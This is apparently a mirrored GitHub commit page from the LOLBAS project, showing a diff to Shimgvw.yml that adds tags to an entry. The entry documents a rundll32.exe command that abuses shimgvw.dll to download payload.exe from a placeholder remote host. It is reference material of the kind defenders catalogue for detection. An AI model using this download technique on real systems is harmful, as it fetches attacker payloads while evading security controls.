public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-29 05:31:53 +02:00
Code Issues Projects Releases Wiki Activity

Adding tags (closes #9, #318) (#362)

Browse Source 
* Adding various tags as a first iteration

* Adding quotes

* Adding 'Custom Format' properly

* Updating to key:value pairs

* Update template
This commit is contained in:
Wietze
2024-04-03 16:53:36 +01:00
committed by GitHub
parent a945bac6be
commit ebbf08ec4d
65 changed files with 229 additions and 66 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
yml/OSLibraries/Shimgvw.yml
View File

@@ -5,12 +5,14 @@ Author: Eral4m
Created: 2021-01-06
Commands:
- Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe. Can also be used with entrypoint 'ImageView_FullscreenA'.
Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.
Usecase: Download file from remote location.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: c:\windows\system32\shimgvw.dll
- Path: c:\windows\syswow64\shimgvw.dll